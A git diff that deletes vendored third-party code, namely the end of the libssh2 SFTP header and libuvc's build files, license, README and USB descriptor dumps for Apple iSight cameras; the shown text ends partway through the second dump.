-#define LIBSSH2_SFTP_S_ISREG(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFREG)
-#define LIBSSH2_SFTP_S_ISDIR(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFDIR)
-#define LIBSSH2_SFTP_S_ISCHR(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFCHR)
-#define LIBSSH2_SFTP_S_ISBLK(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFBLK)
-#define LIBSSH2_SFTP_S_ISFIFO(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFIFO)
-#define LIBSSH2_SFTP_S_ISSOCK(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFSOCK)
-
-/* SFTP File Transfer Flags -- (e.g. flags parameter to sftp_open())
- * Danger will robinson... APPEND doesn't have any effect on OpenSSH servers */
-#define LIBSSH2_FXF_READ                        0x00000001
-#define LIBSSH2_FXF_WRITE                       0x00000002
-#define LIBSSH2_FXF_APPEND                      0x00000004
-#define LIBSSH2_FXF_CREAT                       0x00000008
-#define LIBSSH2_FXF_TRUNC                       0x00000010
-#define LIBSSH2_FXF_EXCL                        0x00000020
-
-/* SFTP Status Codes (returned by libssh2_sftp_last_error() ) */
-#define LIBSSH2_FX_OK                       0
-#define LIBSSH2_FX_EOF                      1
-#define LIBSSH2_FX_NO_SUCH_FILE             2
-#define LIBSSH2_FX_PERMISSION_DENIED        3
-#define LIBSSH2_FX_FAILURE                  4
-#define LIBSSH2_FX_BAD_MESSAGE              5
-#define LIBSSH2_FX_NO_CONNECTION            6
-#define LIBSSH2_FX_CONNECTION_LOST          7
-#define LIBSSH2_FX_OP_UNSUPPORTED           8
-#define LIBSSH2_FX_INVALID_HANDLE           9
-#define LIBSSH2_FX_NO_SUCH_PATH             10
-#define LIBSSH2_FX_FILE_ALREADY_EXISTS      11
-#define LIBSSH2_FX_WRITE_PROTECT            12
-#define LIBSSH2_FX_NO_MEDIA                 13
-#define LIBSSH2_FX_NO_SPACE_ON_FILESYSTEM   14
-#define LIBSSH2_FX_QUOTA_EXCEEDED           15
-#define LIBSSH2_FX_UNKNOWN_PRINCIPLE        16 /* Initial mis-spelling */
-#define LIBSSH2_FX_UNKNOWN_PRINCIPAL        16
-#define LIBSSH2_FX_LOCK_CONFlICT            17 /* Initial mis-spelling */
-#define LIBSSH2_FX_LOCK_CONFLICT            17
-#define LIBSSH2_FX_DIR_NOT_EMPTY            18
-#define LIBSSH2_FX_NOT_A_DIRECTORY          19
-#define LIBSSH2_FX_INVALID_FILENAME         20
-#define LIBSSH2_FX_LINK_LOOP                21
-
-/* Returned by any function that would block during a read/write opperation */
-#define LIBSSH2SFTP_EAGAIN LIBSSH2_ERROR_EAGAIN
-
-/* SFTP API */
-LIBSSH2_API LIBSSH2_SFTP *libssh2_sftp_init(LIBSSH2_SESSION *session);
-LIBSSH2_API int libssh2_sftp_shutdown(LIBSSH2_SFTP *sftp);
-LIBSSH2_API unsigned long libssh2_sftp_last_error(LIBSSH2_SFTP *sftp);
-LIBSSH2_API LIBSSH2_CHANNEL *libssh2_sftp_get_channel(LIBSSH2_SFTP *sftp);
-
-/* File / Directory Ops */
-LIBSSH2_API LIBSSH2_SFTP_HANDLE *libssh2_sftp_open_ex(LIBSSH2_SFTP *sftp,
-                                                      const char *filename,
-                                                      unsigned int filename_len,
-                                                      unsigned long flags,
-                                                      long mode, int open_type);
-#define libssh2_sftp_open(sftp, filename, flags, mode) \
-    libssh2_sftp_open_ex((sftp), (filename), strlen(filename), (flags), \
-                         (mode), LIBSSH2_SFTP_OPENFILE)
-#define libssh2_sftp_opendir(sftp, path) \
-    libssh2_sftp_open_ex((sftp), (path), strlen(path), 0, 0, \
-                         LIBSSH2_SFTP_OPENDIR)
-
-LIBSSH2_API ssize_t libssh2_sftp_read(LIBSSH2_SFTP_HANDLE *handle,
-                                      char *buffer, size_t buffer_maxlen);
-
-LIBSSH2_API int libssh2_sftp_readdir_ex(LIBSSH2_SFTP_HANDLE *handle, \
-                                        char *buffer, size_t buffer_maxlen,
-                                        char *longentry,
-                                        size_t longentry_maxlen,
-                                        LIBSSH2_SFTP_ATTRIBUTES *attrs);
-#define libssh2_sftp_readdir(handle, buffer, buffer_maxlen, attrs)      \
-    libssh2_sftp_readdir_ex((handle), (buffer), (buffer_maxlen), NULL, 0, \
-                            (attrs))
-
-LIBSSH2_API ssize_t libssh2_sftp_write(LIBSSH2_SFTP_HANDLE *handle,
-                                       const char *buffer, size_t count);
-LIBSSH2_API int libssh2_sftp_fsync(LIBSSH2_SFTP_HANDLE *handle);
-
-LIBSSH2_API int libssh2_sftp_close_handle(LIBSSH2_SFTP_HANDLE *handle);
-#define libssh2_sftp_close(handle) libssh2_sftp_close_handle(handle)
-#define libssh2_sftp_closedir(handle) libssh2_sftp_close_handle(handle)
-
-LIBSSH2_API void libssh2_sftp_seek(LIBSSH2_SFTP_HANDLE *handle, size_t offset);
-LIBSSH2_API void libssh2_sftp_seek64(LIBSSH2_SFTP_HANDLE *handle,
-                                     libssh2_uint64_t offset);
-#define libssh2_sftp_rewind(handle) libssh2_sftp_seek64((handle), 0)
-
-LIBSSH2_API size_t libssh2_sftp_tell(LIBSSH2_SFTP_HANDLE *handle);
-LIBSSH2_API libssh2_uint64_t libssh2_sftp_tell64(LIBSSH2_SFTP_HANDLE *handle);
-
-LIBSSH2_API int libssh2_sftp_fstat_ex(LIBSSH2_SFTP_HANDLE *handle,
-                                      LIBSSH2_SFTP_ATTRIBUTES *attrs,
-                                      int setstat);
-#define libssh2_sftp_fstat(handle, attrs) \
-    libssh2_sftp_fstat_ex((handle), (attrs), 0)
-#define libssh2_sftp_fsetstat(handle, attrs) \
-    libssh2_sftp_fstat_ex((handle), (attrs), 1)
-
-/* Miscellaneous Ops */
-LIBSSH2_API int libssh2_sftp_rename_ex(LIBSSH2_SFTP *sftp,
-                                       const char *source_filename,
-                                       unsigned int srouce_filename_len,
-                                       const char *dest_filename,
-                                       unsigned int dest_filename_len,
-                                       long flags);
-#define libssh2_sftp_rename(sftp, sourcefile, destfile) \
-    libssh2_sftp_rename_ex((sftp), (sourcefile), strlen(sourcefile), \
-                           (destfile), strlen(destfile),                \
-                           LIBSSH2_SFTP_RENAME_OVERWRITE | \
-                           LIBSSH2_SFTP_RENAME_ATOMIC | \
-                           LIBSSH2_SFTP_RENAME_NATIVE)
-
-LIBSSH2_API int libssh2_sftp_unlink_ex(LIBSSH2_SFTP *sftp,
-                                       const char *filename,
-                                       unsigned int filename_len);
-#define libssh2_sftp_unlink(sftp, filename) \
-    libssh2_sftp_unlink_ex((sftp), (filename), strlen(filename))
-
-LIBSSH2_API int libssh2_sftp_fstatvfs(LIBSSH2_SFTP_HANDLE *handle,
-                                      LIBSSH2_SFTP_STATVFS *st);
-
-LIBSSH2_API int libssh2_sftp_statvfs(LIBSSH2_SFTP *sftp,
-                                     const char *path,
-                                     size_t path_len,
-                                     LIBSSH2_SFTP_STATVFS *st);
-
-LIBSSH2_API int libssh2_sftp_mkdir_ex(LIBSSH2_SFTP *sftp,
-                                      const char *path,
-                                      unsigned int path_len, long mode);
-#define libssh2_sftp_mkdir(sftp, path, mode) \
-    libssh2_sftp_mkdir_ex((sftp), (path), strlen(path), (mode))
-
-LIBSSH2_API int libssh2_sftp_rmdir_ex(LIBSSH2_SFTP *sftp,
-                                      const char *path,
-                                      unsigned int path_len);
-#define libssh2_sftp_rmdir(sftp, path) \
-    libssh2_sftp_rmdir_ex((sftp), (path), strlen(path))
-
-LIBSSH2_API int libssh2_sftp_stat_ex(LIBSSH2_SFTP *sftp,
-                                     const char *path,
-                                     unsigned int path_len,
-                                     int stat_type,
-                                     LIBSSH2_SFTP_ATTRIBUTES *attrs);
-#define libssh2_sftp_stat(sftp, path, attrs) \
-    libssh2_sftp_stat_ex((sftp), (path), strlen(path), LIBSSH2_SFTP_STAT, \
-                         (attrs))
-#define libssh2_sftp_lstat(sftp, path, attrs) \
-    libssh2_sftp_stat_ex((sftp), (path), strlen(path), LIBSSH2_SFTP_LSTAT, \
-                         (attrs))
-#define libssh2_sftp_setstat(sftp, path, attrs) \
-    libssh2_sftp_stat_ex((sftp), (path), strlen(path), LIBSSH2_SFTP_SETSTAT, \
-                         (attrs))
-
-LIBSSH2_API int libssh2_sftp_symlink_ex(LIBSSH2_SFTP *sftp,
-                                        const char *path,
-                                        unsigned int path_len,
-                                        char *target,
-                                        unsigned int target_len, int link_type);
-#define libssh2_sftp_symlink(sftp, orig, linkpath) \
-    libssh2_sftp_symlink_ex((sftp), (orig), strlen(orig), (linkpath), \
-                            strlen(linkpath), LIBSSH2_SFTP_SYMLINK)
-#define libssh2_sftp_readlink(sftp, path, target, maxlen) \
-    libssh2_sftp_symlink_ex((sftp), (path), strlen(path), (target), (maxlen), \
-    LIBSSH2_SFTP_READLINK)
-#define libssh2_sftp_realpath(sftp, path, target, maxlen) \
-    libssh2_sftp_symlink_ex((sftp), (path), strlen(path), (target), (maxlen), \
-                            LIBSSH2_SFTP_REALPATH)
-
-#ifdef __cplusplus
-} /* extern "C" */
-#endif
-
-#endif /* LIBSSH2_SFTP_H */
diff --git a/thirdparty/libuvc-0.0.6/.gitignore b/thirdparty/libuvc-0.0.6/.gitignore
deleted file mode 100644
index 5f97a27..0000000
--- a/thirdparty/libuvc-0.0.6/.gitignore
+++ /dev/null
@@ -1,2 +0,0 @@
-# Build directory (recommended location)
-build/
diff --git a/thirdparty/libuvc-0.0.6/.travis.yml b/thirdparty/libuvc-0.0.6/.travis.yml
deleted file mode 100644
index fe27da4..0000000
--- a/thirdparty/libuvc-0.0.6/.travis.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-sudo: false
-language: cpp
-compiler:
- - gcc
- - clang
-addons:
- apt:
-  packages:
-   - libusb-1.0-0-dev
-   - libjpeg-dev
-before_script:
- - mkdir build
- - cd build
- - cmake ..
-script:
- - make
diff --git a/thirdparty/libuvc-0.0.6/CMakeLists.txt b/thirdparty/libuvc-0.0.6/CMakeLists.txt
deleted file mode 100644
index 9252224..0000000
--- a/thirdparty/libuvc-0.0.6/CMakeLists.txt
+++ /dev/null
@@ -1,118 +0,0 @@
-cmake_minimum_required(VERSION 2.8)
-project(libuvc)
-
-if (NOT CMAKE_BUILD_TYPE)
-  message(STATUS "No build type selected, default to Release")
-  set(CMAKE_BUILD_TYPE "Release" CACHE STRING "" FORCE)
-endif ()
-
-if (NOT CMAKE_BUILD_TARGET)
-  message(STATUS "No target type selected, default to both shared and static library")
-  set(CMAKE_BUILD_TARGET "Both" CACHE STRING "" FORCE)
-endif()
-
-set(libuvc_VERSION_MAJOR 0)
-set(libuvc_VERSION_MINOR 0)
-set(libuvc_VERSION_PATCH 6)
-set(libuvc_VERSION ${libuvc_VERSION_MAJOR}.${libuvc_VERSION_MINOR}.${libuvc_VERSION_PATCH})
-
-set(libuvc_DESCRIPTION "A cross-platform library for USB video devices")
-set(libuvc_URL "https://github.com/ktossell/libuvc")
-
-find_package(PkgConfig)
-pkg_check_modules(LIBUSB libusb-1.0)
-
-include(GNUInstallDirs)
-
-SET(CMAKE_C_FLAGS_DEBUG "-g -DUVC_DEBUGGING")
-
-SET(INSTALL_CMAKE_DIR "${CMAKE_INSTALL_PREFIX}/lib/cmake/libuvc" CACHE PATH
-	"Installation directory for CMake files")
-
-SET(SOURCES src/ctrl.c src/ctrl-gen.c src/device.c src/diag.c
-           src/frame.c src/init.c src/stream.c
-           src/misc.c)
-
-include_directories(
-  ${libuvc_SOURCE_DIR}/include
-  ${libuvc_BINARY_DIR}/include
-  ${LIBUSB_INCLUDE_DIRS}
-)
-
-message(WARNING "libuvc will not support JPEG decoding.")
-
-if(${CMAKE_BUILD_TARGET} MATCHES "Shared")
-  set(BUILD_UVC_SHARED TRUE)
-elseif(${CMAKE_BUILD_TARGET} MATCHES "Static")
-  set(BUILD_UVC_STATIC TRUE)
-elseif(${CMAKE_BUILD_TARGET} MATCHES "Both")
-  set(BUILD_UVC_SHARED TRUE)
-  set(BUILD_UVC_STATIC TRUE)
-else()
-  message( FATAL_ERROR "Invalid build type ${CMAKE_BUILD_TARGET}" )
-endif()
-
-if(BUILD_UVC_SHARED)
-  add_library(uvc SHARED ${SOURCES})
-  list(APPEND UVC_TARGETS uvc)
-endif()
-
-if(BUILD_UVC_STATIC)
-  add_library(uvc_static STATIC ${SOURCES})
-  set_target_properties(uvc_static PROPERTIES OUTPUT_NAME uvc)
-  list(APPEND UVC_TARGETS uvc_static)
-endif()
-
-configure_file(include/libuvc/libuvc_config.h.in
-  ${PROJECT_BINARY_DIR}/include/libuvc/libuvc_config.h @ONLY)
-
-foreach(target_name ${UVC_TARGETS})
-  set_target_properties(${target_name} PROPERTIES
-    PUBLIC_HEADER "include/libuvc/libuvc.h;${libuvc_BINARY_DIR}/include/libuvc/libuvc_config.h" )
-endforeach()
-
-if(BUILD_UVC_SHARED)
-  if(JPEG_FOUND)
-    target_link_libraries (uvc ${JPEG_LINK_FLAGS})
-  endif(JPEG_FOUND)
-
-  target_link_libraries(uvc ${LIBUSB_LIBRARIES})
-
-  #add_executable(test src/test.c)
-  #target_link_libraries(test uvc ${LIBUSB_LIBRARIES} opencv_highgui
-  #  opencv_core)
-endif()
-
-install(TARGETS ${UVC_TARGETS}
-    EXPORT libuvcTargets
-  LIBRARY DESTINATION "${CMAKE_INSTALL_PREFIX}/lib/${CMAKE_LIBRARY_ARCHITECTURE}"
-  ARCHIVE DESTINATION "${CMAKE_INSTALL_PREFIX}/lib/${CMAKE_LIBRARY_ARCHITECTURE}"
-  PUBLIC_HEADER DESTINATION "${CMAKE_INSTALL_PREFIX}/include/libuvc"
-)
-
-export(TARGETS ${UVC_TARGETS}
-  FILE "${PROJECT_BINARY_DIR}/libuvcTargets.cmake")
-export(PACKAGE libuvc)
-
-set(CONF_INCLUDE_DIR "${CMAKE_INSTALL_PREFIX}/include")
-set(CONF_LIBRARY_DIR "${CMAKE_INSTALL_PREFIX}/lib/${CMAKE_LIBRARY_ARCHITECTURE}")
-set(CONF_LIBRARY "${CMAKE_INSTALL_PREFIX}/lib/${CMAKE_LIBRARY_ARCHITECTURE}/${CMAKE_SHARED_LIBRARY_PREFIX}uvc${CMAKE_SHARED_LIBRARY_SUFFIX}")
-
-configure_file(libuvcConfig.cmake.in ${PROJECT_BINARY_DIR}${CMAKE_FILES_DIRECTORY}/libuvcConfig.cmake)
-
-configure_file(libuvcConfigVersion.cmake.in ${PROJECT_BINARY_DIR}/libuvcConfigVersion.cmake @ONLY)
-
-configure_file(libuvc.pc.in ${PROJECT_BINARY_DIR}/libuvc.pc @ONLY)
-
-install(FILES
-  "${PROJECT_BINARY_DIR}${CMAKE_FILES_DIRECTORY}/libuvcConfig.cmake"
-  "${PROJECT_BINARY_DIR}/libuvcConfigVersion.cmake"
-  DESTINATION "${INSTALL_CMAKE_DIR}")
-
-install(EXPORT libuvcTargets
-  DESTINATION "${INSTALL_CMAKE_DIR}")
-
-install(FILES
-  "${PROJECT_BINARY_DIR}/libuvc.pc"
-  DESTINATION "${CMAKE_INSTALL_LIBDIR}/pkgconfig"
-)
diff --git a/thirdparty/libuvc-0.0.6/LICENSE.txt b/thirdparty/libuvc-0.0.6/LICENSE.txt
deleted file mode 100644
index 4acc5dd..0000000
--- a/thirdparty/libuvc-0.0.6/LICENSE.txt
+++ /dev/null
@@ -1,31 +0,0 @@
-Software License Agreement (BSD License)
-
-Copyright (C) 2010-2015 Ken Tossell
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions
-are met:
-
- * Redistributions of source code must retain the above copyright
-   notice, this list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above
-   copyright notice, this list of conditions and the following
-   disclaimer in the documentation and/or other materials provided
-   with the distribution.
- * Neither the name of the author nor other contributors may be
-   used to endorse or promote products derived from this software
-   without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGE.
diff --git a/thirdparty/libuvc-0.0.6/README.md b/thirdparty/libuvc-0.0.6/README.md
deleted file mode 100644
index 399441a..0000000
--- a/thirdparty/libuvc-0.0.6/README.md
+++ /dev/null
@@ -1,26 +0,0 @@
-`libuvc` is a cross-platform library for USB video devices, built atop `libusb`.
-It enables fine-grained control over USB video devices exporting the standard USB Video Class
-(UVC) interface, enabling developers to write drivers for previously unsupported devices,
-or just access UVC devices in a generic fashion.
-
-## Getting and Building libuvc
-
-Prerequisites: You will need `libusb` and [CMake](http://www.cmake.org/) installed.
-
-To build, you can just run these shell commands:
-
-    git clone https://github.com/ktossell/libuvc
-    cd libuvc
-    mkdir build
-    cd build
-    cmake ..
-    make && sudo make install
-
-and you're set! If you want to change the build configuration, you can edit `CMakeCache.txt`
-in the build directory, or use a CMake GUI to make the desired changes.
-
-## Developing with libuvc
-
-The documentation for `libuvc` can currently be found at https://int80k.com/libuvc/doc/.
-
-Happy hacking!
diff --git a/thirdparty/libuvc-0.0.6/cameras/isight_imac.txt b/thirdparty/libuvc-0.0.6/cameras/isight_imac.txt
deleted file mode 100644
index e367025..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/isight_imac.txt
+++ /dev/null
@@ -1,228 +0,0 @@
-
-Bus 001 Device 007: ID 05ac:8501 Apple, Inc. Built-in iSight [Micron]
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x05ac Apple, Inc.
-  idProduct          0x8501 Built-in iSight [Micron]
-  bcdDevice            1.89
-  iManufacturer           1 Micron
-  iProduct                2 Built-in iSight
-  iSerial                 0 
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength          267
-    bNumInterfaces          2
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              100mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength           49
-        dwClockFrequency       13.500000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                16
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  1
-        bmControls           0x00000000
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 2
-        bSourceID               1
-        wMaxMultiplier          0
-        bControlSize            2
-        bmControls     0x00000039
-          Brightness
-          Saturation
-          Sharpness
-          Gamma
-        iProcessing             0 
-        bmVideoStandards     0x 9
-          None
-          SECAM - 625/50
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               2
-        iTerminal               0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0008  1x 8 bytes
-        bInterval              10
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            14
-        bDescriptorType                    36
-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         1
-        wTotalLength                      155
-        bEndPointAddress                  130
-        bmInfo                              0
-        bTerminalLink                       3
-        bStillCaptureMethod                 0
-        bTriggerSupport                     0
-        bTriggerUsage                       0
-        bControlSize                        1
-        bmaControls( 0)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors                3
-        guidFormat                            {55595659-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1400  3x 1024 bytes
-        bInterval               1
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass           14 Video
-  bDeviceSubClass         2 Video Streaming
-  bDeviceProtocol         0 
-  bMaxPacketSize0         8
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/isight_macbook.txt b/thirdparty/libuvc-0.0.6/cameras/isight_macbook.txt
deleted file mode 100644
index 62d0337..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/isight_macbook.txt
+++ /dev/null
@@ -1,228 +0,0 @@
-
-Bus 001 Device 010: ID 05ac:8501 Apple, Inc. Built-in iSight [Micron]
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x05ac Apple, Inc.
-  idProduct          0x8501 Built-in iSight [Micron]
-  bcdDevice            1.89
-  iManufacturer           1 Micron
-  iProduct                2 Built-in iSight
-  iSerial                 0 
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength          267
-    bNumInterfaces          2
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              100mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength           49
-        dwClockFrequency       13.500000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                16
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  1
-        bmControls           0x00000000
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 2
-        bSourceID               1
-        wMaxMultiplier          0
-        bControlSize            2
-        bmControls     0x00000039
-          Brightness
-          Saturation
-          Sharpness
-          Gamma
-        iProcessing             0 
-        bmVideoStandards     0x 9
-          None
-          SECAM - 625/50
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               2
-        iTerminal               0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0008  1x 8 bytes
-        bInterval              10
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            14
-        bDescriptorType                    36
-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         1
-        wTotalLength                      155
-        bEndPointAddress                  130
-        bmInfo                              0
-        bTerminalLink                       3
-        bStillCaptureMethod                 0
-        bTriggerSupport                     0
-        bTriggerUsage                       0
-        bControlSize                        1
-        bmaControls( 0)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors                3
-        guidFormat                            {55595659-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
